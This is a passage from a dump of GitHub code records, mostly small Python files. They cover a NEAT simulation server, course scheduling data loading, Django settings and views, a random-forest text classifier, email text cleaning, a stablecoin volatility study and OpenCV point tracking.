input_value]\n        \"\"\"\n        set_command = self._listen_for_command(\"SetInputs\", {\"block_id\": block_id})\n        self._respond_to_command(copy.deepcopy(set_command))\n\n        # Iterate over a snapshot: the dict is mutated (string keys are\n        # swapped for ObjectId keys) while we walk it.\n        for key, value in list(set_command.parameters[\"block\"].items()):\n            del set_command.parameters[\"block\"][key]\n            set_command.parameters[\"block\"][ObjectId(key)] = value\n\n        return set_command.parameters[\"block\"]\n\n    def send_block_outputs(\n            self,\n            outputs: Dict[ObjectId, Dict[str, float]],\n            block_id: int\n    ) -> None:\n        \"\"\"\n        Awaits the GetOutputs command to be sent by the client\n        and sends the outputs for the previously received\n        inputs back to the client.\n        :param outputs: The output values as dictionary of\n        genome_id: Dict[output_label: output_value]\n        :param block_id: The id of the block whose outputs\n        should be sent\n        :return: None\n        \"\"\"\n        get_command = self._listen_for_command(\"GetOutputs\", {\"block_id\": block_id})\n\n        # Same snapshot trick: ObjectId keys are replaced by their string form.\n        for key, value in list(outputs.items()):\n            del outputs[key]\n            outputs[key.__str__()] = value\n\n        result = {\n            \"outputs\": outputs\n        }\n        self._respond_to_command(get_command, result)\n\n    def get_fitness_values(\n            self,\n            block_id: int\n    ) -> Dict[ObjectId, float]:\n        \"\"\"\n        Awaits the SetFitnessValues command to be sent by the client.\n        :param block_id: The id of the block whose fitness values\n        should be received\n        :return: The received fitness values as dictionary of\n        genome_id: fitness_value\n        \"\"\"\n        set_command = 
self._listen_for_command(\n            \"SetFitnessValues\",\n            {\n                \"block_id\": block_id\n            }\n        )\n        self._respond_to_command(copy.deepcopy(set_command))\n        # Iterate over a snapshot, since keys are re-inserted as ObjectIds.\n        for key, value in list(set_command.parameters[\"fitness_values\"].items()):\n            del set_command.parameters[\"fitness_values\"][key]\n            set_command.parameters[\"fitness_values\"][ObjectId(key)] = value\n\n        return set_command.parameters[\"fitness_values\"]\n\n    def get_advance_generation(self) -> bool:\n        \"\"\"\n        Awaits the AdvanceGeneration command to be sent by the client.\n        :return: A bool indicating whether the next generation should be\n        calculated by NEAT (True) or the current session should be archived\n        (False).\n        \"\"\"\n        advance_command = self._listen_for_command(\"AdvanceGeneration\")\n        self._respond_to_command(advance_command)\n        return advance_command.parameters[\"advance_generation\"]\n","repo_name":"strangedev/NEAT_PyGenetics","sub_path":"NEAT/Networking/Server/SimulationConnector.py","file_name":"SimulationConnector.py","file_ext":"py","file_size_in_byte":9116,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} {"seq_id":"73386187672","text":"import csv\nimport sys\n\n\ntext = [line.strip().split(\"\\t\") for line in sys.stdin]\n\nheaders = [\"nomen\", \"definitio\", \"pluma\",\n           \"Russian nomen\", \"familia\", \"Russian nomen familia\"]\n\nwith open(\"plantis.csv\", \"w\", encoding=\"utf-8\") as file:\n    writer = csv.DictWriter(file, fieldnames=headers,\n                            delimiter=\";\", quotechar='\"')\n    writer.writeheader()\n    # print(text)\n    for item in text:\n        res = {}\n        for i in range(len(item)):\n            res[headers[i]] = item[i]\n\n        writer.writerow(res)\n","repo_name":"QBoff/LearnQT","sub_path":"csv_lyceum/task6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"3913582589","text":"import pandas as pd\nimport numpy as np\nimport xlrd\n#Parameters\n#Number of courses\nm = 62\n#Number of classes\nc = 100\n\n##The files are read and the sets are built as arrays (lists of lists)\nroom = pd.read_excel('room.xls')\n#Fix the days column, padding the day codes with zeros\nroom.loc[room['days'] == 100, 'day'] = \"0000100\"\nroom.loc[room['days'] == 1000, 'day'] = \"0001000\"\nroom.loc[room['days'] == 10000, 'day'] = \"0010000\"\nroom.loc[room['days'] == 100000, 'day'] = \"0100000\"\nroom.loc[room['days'] == 1000000, 'day'] = \"1000000\"\n#Here the days column was dropped and replaced by day\nroom = room.drop(['days'], axis=1)\n#Set of room ids with their capacity\nroom_id_cap = room.values[:, [True, True, False, False, False, False]]\nroom_id_cap = np.unique(room_id_cap)\n\n#Set of rooms with all the information\nrooms = room.to_numpy()\n\n#Courses\ncourse = pd.read_excel('course.xls')\n#set of all the course information\ncourses = course.to_numpy()\n\n#Set of courses that do not need a room\ncourses_false = course[course.class_room == False]\ncourses_false = courses_false.drop(['room_id','room_penalty'], axis=1)\ncourses_true = course[(course['class_room'] != False)]\ncourses_true = courses_true.drop(['class_room'], axis = 1)\n\n#Array of the courses that do not need a room\ncourses_false = courses_false.to_numpy()\n\n#Open cursos_room\ncourses_room = pd.read_excel('cursos_room.xls')\n\n#Feasible rooms for a class c, in dictionaries of the form {1: [2,3,4]}\nsalas_factibles = dict()\nclass_limit = dict()\n\nclass_id = courses_room['class_id']\n\nclass_id = np.unique(class_id)\nfor x in 
class_id:\n    salas_factibles[x] = []\n    class_limit[x]= []\n\nfor i in courses_room.index:\n    salas_factibles[courses_room['class_id'][i]].append(courses_room['room_id'][i])\n    class_limit[courses_room['class_id'][i]].append(courses_room['class_limit'][i])\n#All the feasible rooms for a course are available in\n#salas_factibles, which is a dictionary\n\nprint(class_limit)\n#capacity of each class\n\n\n\nhorario = course[course.course_id == 4]\n\n\n\n\n\n#Distribution constraints\ndistribution = pd.read_excel('distribucion.xls')\ndistributions = distribution.to_numpy()\n\n\n\n\n\n#Students will be used in a second stage\n#student = pd.read_excel('student_0.xls')\n#students = student.to_numpy()\n#Distribution constraints","repo_name":"fernandovegauc/capstone","sub_path":"python anteriores/conuntos.py","file_name":"conuntos.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} {"seq_id":"20888144514","text":"## Dictionary Summary\r\n## What is a dictionary?\r\n## An unordered collection of data.\r\n\r\nd = {'name' : 'Siddhartha', 'age' : 20}\r\n\r\n## Or\r\n\r\nd1 = dict(name = 'Siddhartha', age = 20)\r\n\r\n## Or\r\n\r\nd2 = {\r\n    'name' : 'Siddhartha',\r\n    'age' : 20,\r\n    'fav_movies' : []\r\n}\r\n\r\n## How to access data from a dictionary\r\n## You cannot do something like\r\n## d[0], because there is no order inside a dictionary.\r\n## Syntax\r\n# print(d['name'])\r\n\r\n## Add data inside an empty dict\r\n\r\n# empty_dict = {}\r\n# empty_dict['key1'] = value1\r\n# empty_dict['key2'] = value2\r\n# print(empty_dict)\r\n\r\n## Check existence of values inside a dict\r\n## Use the in keyword to check for keys.\r\n\r\n# if 'name' in d:\r\n\r\n## How to iterate over a dictionary\r\n## Most common method\r\n\r\n# for key, value in d.items():\r\n#     print(f'key is {key} and value is {value}')\r\n\r\n## To print all keys\r\n# for i in d:\r\n#     print(i)\r\n\r\n## To print all values\r\n# for i in d.values():\r\n#     print(i)\r\n\r\n## Most common dict method. 
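\r\n# A small added illustration, using d from the top of this file:\r\n# d.get('name') -> 'Siddhartha'; d.get('salary') -> None; d.get('salary', 0) -> 0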
\r\n# get method\r\n# To access a key and check its existence.\r\n\r\n# print(d.get('names'))\r\n\r\n## Q --> Why we use get\r\n## A --> To get rid of the error\r\n\r\n## Example\r\n\r\n# print(d['names'])\r\n# print(d.get('names'))\r\n\r\n## To delete an item\r\n## Pop ----> Takes one argument which is the keyname\r\n\r\n# popped = d.pop('name')\r\n# print(popped)\r\n\r\n## Popitem\r\n\r\n# popped = d.popitem()\r\n# print(popped)\r\n# print(d)","repo_name":"sid2660/Python-totorial","sub_path":"Dictionary_summary.py","file_name":"Dictionary_summary.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"6733385843","text":"from .base import *\n\nDEBUG = False\n\n# Logging\nLOGGING = {\n    \"version\": 1,\n    \"disable_existing_loggers\": False,\n    \"formatters\": {\n        \"verbose\": {\n            \"format\": \"{levelname} {asctime} {module} {process:d} {thread:d} {message}\",\n            \"style\": \"{\",\n        },\n    },\n    \"handlers\": {\n        \"console\": {\n            \"level\": os.getenv(\"DJANGO_LOG_LEVEL\", \"INFO\"),\n            \"formatter\": \"verbose\",\n            \"class\": \"logging.StreamHandler\",\n        },\n    },\n    \"loggers\": {\n        \"django\": {\n            \"handlers\": [\"console\"],\n            \"level\": os.getenv(\"DJANGO_LOG_LEVEL\", \"INFO\"),\n            \"propagate\": True,\n        },\n    },\n}\n\n# allowed hosts\nALLOWED_HOSTS = [\"freeyeti.net\", \"www.freeyeti.net\"]\n\nFORCE_SCRIPT_NAME = \"/backend\"\nSTATIC_URL = \"/backend/static/\"\nMEDIA_URL = \"/backend/media/\"\n\nCSRF_TRUSTED_ORIGINS = [\n    \"https://freeyeti.net\",\n    \"https://www.freeyeti.net\",\n]\n\nCSRF_COOKIE_SECURE = True\nSESSION_COOKIE_SECURE = True\n\n# database optimized for production\nDATABASES = {\n    \"default\": {\n        \"ENGINE\": \"django.contrib.gis.db.backends.postgis\",\n        \"NAME\": os.environ.get(\"DB_NAME\"),\n        \"USER\": os.environ.get(\"DB_USER\"),\n        \"PASSWORD\": os.environ.get(\"DB_PWD\"),\n        \"HOST\": os.environ.get(\"DB_HOST\"),\n        \"PORT\": os.environ.get(\"DB_PORT\"),\n        \"TEST\": {\"NAME\": os.environ.get(\"TEST_DB_NAME\")},\n        \"CONN_MAX_AGE\": 60,\n        \"CONN_HEALTH_CHECKS\": True,\n    }\n}\n\ntry:\n    from .local import *\nexcept ImportError:\n    pass\n","repo_name":"Jianxuan-Li/freeyeti-backend","sub_path":"app/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"11734730782","text":"import neattext.functions as nfx\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nimport joblib\r\n\r\n############ TRAINING ######################\r\ndef Model(df2):\r\n    y = df2[['Bluetooth', 'VC-Settings', 'Volume']]\r\n    corpus = df2['review'].apply(nfx.remove_stopwords)\r\n    tfidf = TfidfVectorizer()\r\n    Xfeatures = tfidf.fit_transform(corpus).toarray()\r\n    X_train, X_test, y_train, y_test = train_test_split(Xfeatures, y, test_size=0.2, random_state=42)\r\n    clf = RandomForestClassifier(n_estimators=100)\r\n    clf.fit(X_train, y_train)\r\n    fr_prediction = clf.predict(X_test)\r\n    print(accuracy_score(y_test, fr_prediction))\r\n    ######## saving model #####\r\n    Random_Forest_clf_file = open(\"Random_Forest_clf_model_file.pkl\", \"wb\")\r\n    joblib.dump(clf, Random_Forest_clf_file)\r\n    Random_Forest_clf_file.close()\r\n    ############ Saving Vectorizer #####\r\n    # Save Vectorizer\r\n    RF_tfidf_vectorizer_file = 
open(\"RF_tfidf_vectorizer.pkl\", \"wb\")\r\n joblib.dump(tfidf, RF_tfidf_vectorizer_file)\r\n RF_tfidf_vectorizer_file.close()\r\n\r\n################# PREDICTION###########\r\ndef Predict(df2):\r\n model = joblib.load('Random_Forest_clf_model_file.pkl')\r\n tfidf_model = joblib.load('RF_tfidf_vectorizer.pkl')\r\n vec_example = tfidf_model.transform(df2['review'])\r\n pre = model.predict(vec_example)\r\n df2[\"Bluetooth\"] = pre[:, 0]\r\n df2[\"VC-Settings\"] = pre[:, 1]\r\n df2[\"Volume\"] = pre[:, 2]\r\n return df2\r\n\r\n","repo_name":"kaleemrehman/MultiLabel-text-classification-Pycharm","sub_path":"RF_Model.py","file_name":"RF_Model.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43345235419","text":"import sys\n\n\n\ndef main(args=None):\n if args is None:\n args = sys.argv[1:]\n\n print(\"Import dictiorm in your project to start using your database \\\n documents and collections like simple dictionaries.\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bmpenuelas/dictiORM","sub_path":"dictiorm/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"36777482146","text":"#coding: utf-8\n\nimport socket\nfrom sacricat.log import logging\n\n\nclass Core:\n \"\"\" Abstract class to define core functions\"\"\"\n length_bytes = 128\n def __init__(self, ip, port, prompt, logLevel=logging.BASIC):\n self.ip = ip\n self.port = port\n self.prompt = prompt\n self.socket = None\n self.logLevel = logLevel\n self.logger = logging.getLogger()\n self.logger.setLevel(self.logLevel)\n\n def _log(self, log, heading=True, level=logging.BASIC):\n if heading:\n log = \"[*] %s:%s - \" % (self.ip, self.port) + log\n self.logger.log(level,log)\n\n def _logConnected(self, msg=''):\n log = \"[+] %s:%s - Connected\" % (self.ip, self.port)\n if msg:\n log += \" - \" + msg\n self._log(log, heading=False)\n\n def _logDisconnected(self, msg=''):\n log = \"[-] %s:%s - Disconnected\" % (self.ip, self.port)\n if msg:\n log += \" - \" + msg\n self._log(log, heading=False)\n\n def close(self):\n res = self.socket.close()\n self._logDisconnected()\n return res\n\n def recv(self, length=None, recv_bytes = None, encoding='latin-1'):\n if not length:\n length = self.length_bytes\n if length < 1:\n raise Exception(\"Length < 1\")\n r = self.socket.recv(length)\n if recv_bytes is None:\n recv_bytes = self.recv_bytes \n if not recv_bytes:\n r = r.decode(encoding)\n self._log(\"Received - \"+repr(r), level=logging.RECV)\n return r\n\n def send(self, msg, sendPrompt=False):\n if type(msg) == str:\n if sendPrompt:\n msg += '\\n'+self.prompt\n msg = msg.encode()\n try:\n self.socket.sendall(msg)\n except socket.error as e:\n self._log(\"Socket Error - \"+str(e), level=logging.ERROR)\n return False\n else:\n self._log(\"Sent - \"+repr(msg), level=logging.SENT)\n return True","repo_name":"Sacriyana/SacriCat","sub_path":"sacricat/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26134244386","text":"######################################################\n#### Stablecoin with minimum volatility weightings ###\n######################################################\n\nimport datetime as dt\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom engine 
import data_cleaning\nfrom engine.generic_functions import resample\n\nfrom engine.portfolio_functions import simulated_ef\nfrom engine import portfolio_functions\n\n#Constant parameters\nstart_date = dt.datetime(2019,7,1)\nend_date = dt.datetime(2019,12,1)\nnum_assets = 5\nnum_portfolios = 1000\nrisk_free_rate = 0.02\n\n#Find list of 10 largest symbols by period over period given by start_date and end_date\nselected_symbols = data_cleaning.universe_selection_on_volume(num_assets, start_date, end_date)\n\n#Create dataframe of close prices\nclose_prices = data_cleaning.df_make('close', selected_symbols, start_date, end_date)\n\n#Create returns matrix\nclose_prices = close_prices.resample('D').mean()\nreturns = close_prices.pct_change()\nmean_returns = returns.mean()\ncov_matrix = returns.cov()\n\n\n#Get weights that minimize variance\nsimulated_ef(close_prices, num_assets, mean_returns, cov_matrix, num_portfolios, risk_free_rate)\nmin_vol_allocation = simulated_ef(close_prices, num_assets, mean_returns, cov_matrix, num_portfolios, risk_free_rate)\nmin_vol_allocation = min_vol_allocation.div(min_vol_allocation.sum(axis=1), axis=0)\n\n#Confirm with scipy computation\nresult = portfolio_functions.find_min_variance_basket(mean_returns, cov_matrix)\n#Extract array of weights\nanalytical_weights = list(result['x'])\nanalytical_weights_df = pd.DataFrame([analytical_weights], columns=selected_symbols)\n\n#Compute stablecoin and plot for weights defined through simulation\nstablecoin_random_weights = pd.DataFrame()\nfor symbol in selected_symbols:\n\tweight = min_vol_allocation[[symbol]].values[0][0]\n\tprint(weight)\n\tweighted_col = returns[[symbol]]*weight\n\tprint(weighted_col)\n\tstablecoin_random_weights = pd.concat([stablecoin_random_weights, weighted_col], axis=1, sort=False)\n\nstablecoin_random_weights_volatility = stablecoin_random_weights.sum(axis=1)\n\n#Plot for equal weights\nequal_weighted_returns_volatility = returns.mean(axis=1)\n\n#Plot for analytical weights \nstablecoin_analytical_weights = pd.DataFrame()\nfor symbol in selected_symbols:\n\tweight = analytical_weights_df[[symbol]].values[0][0]\n\tprint(weight)\n\tweighted_col = returns[[symbol]]*weight\n\tprint(weighted_col)\n\tstablecoin_analytical_weights = pd.concat([stablecoin_analytical_weights, weighted_col], axis=1, sort=False)\n\nstablecoin_analytical_weights_volatility = stablecoin_analytical_weights.sum(axis=1)\n\nfig, ax = plt.subplots()\nmaster_df = pd.concat([equal_weighted_returns_volatility, stablecoin_random_weights_volatility, stablecoin_analytical_weights_volatility], axis = 1, sort = False)\nmaster_df = master_df.rename(columns={0: 'equal_weights', 1:'random_weights', 2: 'analytical_weights'})\nmaster_df.plot(ax=ax)\nax.set_ylabel('Volatility', fontsize = 16)\nax.tick_params(axis='both', which='major', labelsize=16)\nplt.title('Comparing different weights on a currency basket ', fontsize = 16)\nax.legend()\nplt.show()","repo_name":"fsxforte/stablecoin","sub_path":"scripts/stablecoin.py","file_name":"stablecoin.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"31532089748","text":"from django.views.generic import CreateView, ListView, UpdateView, DeleteView\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom apps.topologia.sectores.models import 
Sector\nfrom django.views.generic.edit import FormView\nfrom apps.topologia.sectores.forms import SectorForm\nfrom apps.topologia.estados.models import Estado\nfrom apps.topologia.municipios.models import Municipio\nfrom apps.topologia.parroquias.models import Parroquia\nfrom apps.topologia.poligonales.models import Poligonal\nfrom django.contrib.auth.decorators import login_required\nfrom django.core import serializers\n\n\n@login_required(login_url='/')\ndef RegistrarSector(request):\n \"\"\" Vista basada en Metodos o funciones: (`Registrar`) \"\"\"\n list_estado = Estado.objects.all()\n if request.method == 'POST':\n bandera = request.POST.get('bandera')\n estado = request.POST.get('estado')\n cod_s = request.POST.get('cod_s')\n sector = request.POST.get('sector')\n existe = Sector.objects.filter(estado=estado, cod_s=cod_s).exists()\n existe_t = Sector.objects.filter(estado=estado, cod_s=cod_s, sector=sector).exists()\n if existe_t and bandera == 'true':\n return HttpResponse('existe_t')\n elif existe and bandera == 'true':\n return HttpResponse('existe')\n else:\n form_reg_sector = SectorForm(request.POST, request.FILES)\n if form_reg_sector.is_valid():\n new_reg_sector = form_reg_sector.save(commit=False)\n new_reg_sector.save()\n return HttpResponseRedirect('/configuraciones/topologia/sectores/')\n else:\n form_reg_sector = SectorForm()\n ctx = {'form_reg_sector': form_reg_sector, 'list_estado': list_estado}\n return render_to_response('topologia/sectores/sectores.html',\n ctx, context_instance=RequestContext(request))\n\n\n@login_required(login_url='/')\ndef ActualizarSector(request, pk):\n \"\"\" Vista basada en Metodos o funciones: (`modificar`) \"\"\"\n obj_reg_sec = Sector.objects.get(id=pk)\n list_estado = Estado.objects.all()\n list_mun = Municipio.objects.filter(estado_id=obj_reg_sec.estado_id)\n list_par = Parroquia.objects.filter(estado_id=obj_reg_sec.estado_id, municipio=obj_reg_sec.municipio)\n\n if request.method == 'POST':\n obj_reg_edit_sec = SectorForm(request.POST, request.FILES, instance=obj_reg_sec)\n if obj_reg_edit_sec.is_valid():\n new_reg_sector = obj_reg_edit_sec.save(commit=False)\n new_reg_sector.user = request.user.username\n new_reg_sector.save()\n return HttpResponseRedirect('/configuraciones/topologia/sectores/')\n else:\n obj_reg_edit_sec = SectorForm(instance=obj_reg_sec)\n ctx = {'obj_reg_edit_sec': obj_reg_edit_sec, 'obj_reg_sec': obj_reg_sec,\n 'list_estado': list_estado, 'list_mun': list_mun, 'list_par': list_par} # ctx = Contexto\n return render_to_response('topologia/sectores/modificar.html', ctx,\n context_instance=RequestContext(request))\n\n\nclass ListarSector(ListView):\n \"\"\" Vista basada en clase: (`Listar`)\n\n :param template_name: ruta de la plantilla\n :param model: Modelo al cual se hace referencia\n :param context_object_name: nombre del objeto que contiene esta vista\n \"\"\"\n model = Sector\n template_name = 'topologia/sectores/listar.html'\n context_object_name = \"listar_sectores\"\n\n\n def get_context_data(self, **kwargs):\n # Llamamos ala implementacion para traer un primer context\n context = super(ListarSector, self).get_context_data(**kwargs)\n # Agregamos un QuerySet\n context['list_m'] = Municipio.objects.all()\n context['list_p'] = Parroquia.objects.all()\n return context\n\n\nclass BorrarSector(DeleteView):\n \"\"\" Vista basada en clase: (`Borrar`)\n\n :param template_name: ruta de la plantilla\n :param model: Modelo al cual se hace referencia\n :param success_url: nombre de la ruta a la cual se redireccionara la 
aplicacion una vez eliminado el registro\n satisfactoriamente\n :param context_object_name: nombre del objeto que contiene esta vista\n \"\"\"\n model = Sector\n template_name = 'topologia/sectores/borrar.html'\n context_object_name = \"borrar_sector\"\n success_url = reverse_lazy(\"listar_sectores\")\n\n def get_context_data(self, **kwargs):\n context = super(BorrarSector, self).get_context_data(**kwargs)\n pk_sec = self.kwargs['pk']\n sector = Sector.objects.all()\n id_sec = sector.filter(pk=pk_sec).values('cod_s')\n id_par = sector.filter(pk=pk_sec).values('parroquia')\n id_mun = sector.filter(pk=pk_sec).values('municipio')\n id_est = sector.filter(pk=pk_sec).values('estado_id')\n\n pol = Poligonal.objects.all()\n existe = pol.filter(sector =id_sec ,parroquia=id_par, municipio=id_mun, estado_id=id_est)\n cantidad = len(existe)\n\n context['cantidad'] = cantidad\n\n return context\n","repo_name":"desarrollosimagos/exit_poll","sub_path":"apps/topologia/sectores/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32500164170","text":"\"\"\"\nPrint decision algorithm combination for documentation\n\"\"\"\n\nfrom abac.const import DENY, PERMIT, NOT_APPLICABLE, INDETERMINATE\nfrom abac.algorithm import (\n permit_unless_deny,\n deny_unless_permit,\n permit_overrides,\n deny_overrides\n)\n\nDECISIONS = [PERMIT, DENY, NOT_APPLICABLE, INDETERMINATE]\nBOLD = '**'\nNORMAL = ''\nRED = ''\nGREEN = ''\nBLUE = ''\nWHITE = ''\n\nstr_color = '{color}{decision}{normal}'\n\nCOLOR_DECISIONS = {\n PERMIT: str_color.format(\n color=GREEN,\n decision=PERMIT,\n normal=NORMAL,\n ),\n DENY: str_color.format(\n color=RED,\n decision=DENY,\n normal=NORMAL,\n ),\n NOT_APPLICABLE: str_color.format(\n color=WHITE,\n decision=NOT_APPLICABLE,\n normal=NORMAL,\n ),\n INDETERMINATE: str_color.format(\n color=BLUE,\n decision=INDETERMINATE,\n normal=NORMAL,\n ),\n}\n\nLENGTH = 21\nCOLOR_LENGTH = 30\nCOUNT_COLUMN = len(DECISIONS)\n\nstr_row = '|' + '{:^{length}} |'*(COUNT_COLUMN+1)\nstr_color_row = '|' + '{:^{length}} |' + '{:^{color_length}} |'*COUNT_COLUMN\nstr_line = '|' + ('-'*(LENGTH + 1) + '|')*(COUNT_COLUMN + 1)\n\n\ndef print_decision_combination(alg):\n print('### ' + alg.__name__.upper())\n print()\n print(str_row.format('', *DECISIONS, length=LENGTH))\n print(str_line)\n for decision in DECISIONS:\n print(str_color_row.format(\n '**{}**'.format(decision),\n *[COLOR_DECISIONS[alg([decision, d])] for d in DECISIONS],\n length=LENGTH,\n color_length=COLOR_LENGTH\n ))\n print()\n\n\nALGS = [\n permit_unless_deny,\n deny_unless_permit,\n permit_overrides,\n deny_overrides\n]\n\nfor alg in ALGS:\n print_decision_combination(alg)\n\n","repo_name":"Weltraum/django-abac","sub_path":"abac/_development/plot_algorithm_combination.py","file_name":"plot_algorithm_combination.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"28302591331","text":"import re\nimport os\nimport sys\nimport json\nimport string\nimport warnings\nimport pendulum\nimport numpy as np\n\nfrom copy import deepcopy\nfrom bs4 import BeautifulSoup, MarkupResemblesLocatorWarning\nfrom nltk.corpus import stopwords\n\nwarnings.filterwarnings(\n 'ignore', category=MarkupResemblesLocatorWarning, module='bs4')\n\nwith open('../config/ignore_words.json', 'r') as ig:\n ignore_words = json.load(ig)\n\n\ndef 
convert_html_tags(cv_text):\n cv_list = cv_text.split(' ')\n goodwords = ''\n for cword in cv_list:\n tt = BeautifulSoup(cword, 'html.parser')\n BeautifulSoup()\n goodwords = goodwords + ' ' + str(tt)\n return (goodwords)\n\n\ndef fix_ts(dt_stamp):\n ts = pendulum.parse(str(dt_stamp)).to_rfc3339_string()\n return (str(ts))\n\n\ndef lcase_email(str_text):\n tmp_emails = []\n if type(str_text) == str:\n return (str_text.lower())\n else:\n for lce in str_text:\n tmp_emails.append(str(lce).lower())\n return (tmp_emails)\n\n\ndef find_urls(body_txt):\n urls = re.findall(\n 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', body_txt)\n return (urls)\n\n\ndef clean_body(body_txt, bodytype='body'):\n body_txt = convert_html_tags(body_txt)\n body_txt = remove_punct(body_txt)\n body_txt = body_txt.replace('\\n', ' ')\n body_txt = body_txt.replace('\\r', ' ').lower()\n body_txt = body_txt.replace(' zwnj ', ' ')\n body_txt = body_txt.replace('’', '')\n\n urls = find_urls(body_txt) # remove urls, those are seperate field\n for url in urls:\n body_txt = body_txt.replace(url, ' ')\n\n body_list = body_txt.split()\n body_list = unique_words(body_list)\n body_copy = deepcopy(body_list)\n for each_word in body_copy:\n if each_word in body_list:\n each_word == make_ascii(each_word)\n if len(each_word) <= 2 or len(each_word) >= 20:\n body_list.remove(each_word)\n continue\n\n if each_word in stopwords.words('english'):\n body_list.remove(each_word)\n\n if each_word in ignore_words:\n body_list.remove(each_word)\n\n body_copy.clear()\n\n if len(body_list) <= 10 and bodytype == 'body':\n return None\n\n if len(body_list) <= 3 and bodytype == 'subject':\n return None\n\n body_txt = ' '.join(body_list)\n body_txt = ' '.join(body_txt.split()).lstrip()\n return (body_txt)\n\n\ndef unique_words(word_list):\n tmp_list = []\n for thatword in word_list:\n if thatword not in tmp_list:\n tmp_list.append(thatword)\n\n return (tmp_list)\n\n\ndef make_ascii(to_text):\n str_en = to_text.encode('ascii', 'ignore')\n return (str_en.decode())\n\n\ndef remove_punct(rptext):\n rptext = str(rptext).replace('.', ' ')\n rptext = rptext.translate(str.maketrans('', '', string.punctuation))\n return (rptext)\n\ndef merge_account_emails(acct_files):\n for user_id, ufiles in acct_files.items():\n msg_db = []\n clean_files = []\n for ifile in ufiles:\n print('opening file ' + ifile)\n clean_files.append(ifile)\n with open(ifile, 'r') as infile:\n msg_import = json.load(infile)\n msg_db.extend(msg_import)\n \n for rmfile in clean_files:\n print('removing ' + rmfile)\n os.remove(rmfile)\n return(msg_db)","repo_name":"mobjack/musubihero","sub_path":"bin/email_corrector.py","file_name":"email_corrector.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11865080019","text":"\"\"\"\nImplements blockmatching algorithm in OpenCV.\n\"\"\"\n\n# pylint: disable=no-member\nimport json\nimport argparse\nimport tempfile\n#import logging\n\nimport magic\nimport cv2\nimport numpy as np\nfrom constants import Engines,MIME\n\nPOINT_ARRAY_OUT='point_array_out'\nRED = (0, 0, 255)\nBLACK = (0,0,0)\nTEXT_FACE = cv2.FONT_HERSHEY_DUPLEX\nTEXT_SCALE = 0.75\nTEXT_THICKNESS = 2\nTEXT_MARGIN = 5\n\n## JPEG support\n\nclass ConversionError(RuntimeError):\n \"\"\"Special error\"\"\"\n def __init__(self,msg):\n super().__init__(msg)\n\ndef is_jpeg(buffer):\n return magic.from_buffer(buffer,mime=True) in [ MIME.JPEG ]\n\ndef 
cv2_track_frame(*,frame0, frame1, trackpoints):\n    \"\"\"\n    Summary - Takes the previous frame and the new frame, tracks the given points from one to the other, and returns the updated trackpoints.\n    :param: frame0 - cv2 image of the previous frame in CV2 format\n    :param: frame1 - cv2 image of the current frame in CV2 format\n    :param: trackpoints - array of trackpoints (dicts of x,y and label)\n    :return: array of trackpoints\n\n    \"\"\"\n    winSize=(15, 15)\n    maxLevel=2\n    criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03)\n    tpts = np.array([[pt['x'],pt['y']] for pt in trackpoints],dtype=np.float32)\n\n    try:\n        gray_frame0 = cv2.cvtColor(frame0, cv2.COLOR_BGR2GRAY)\n        gray_frame1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)\n        point_array_out, status_array, err = cv2.calcOpticalFlowPyrLK(gray_frame0, gray_frame1, tpts, None,\n                                                                      winSize=winSize, maxLevel=maxLevel, criteria=criteria)\n        trackpoints_out = []\n        for (i,pt) in enumerate(trackpoints):\n            if status_array[i]==1:\n                trackpoints_out.append({'x':point_array_out[i][0],\n                                        'y':point_array_out[i][1],\n                                        'status':int(status_array[i]),\n                                        'err':float(err[i]),\n                                        'label':pt['label']})\n        print(\"tpts=\",tpts)\n        print(\"point_array_out=\",point_array_out)\n        print(\"status_array=\",status_array,\"err=\",err)\n        print(\"trackpoints_out=\",trackpoints_out)\n        print(\"\")\n\n    except cv2.error:\n        trackpoints_out = []\n\n    return trackpoints_out\n\ndef cv2_label_frame(*, frame, trackpoints, frame_label=None):\n    \"\"\"\n    :param: frame - cv2 frame\n    :param: trackpoints - array of dicts\n    :param frame_label - if present, label for frame number (can be int or string)\n    \"\"\"\n\n    #width = len(frame)\n    height = len(frame[0])\n\n    # use the points to annotate the colored 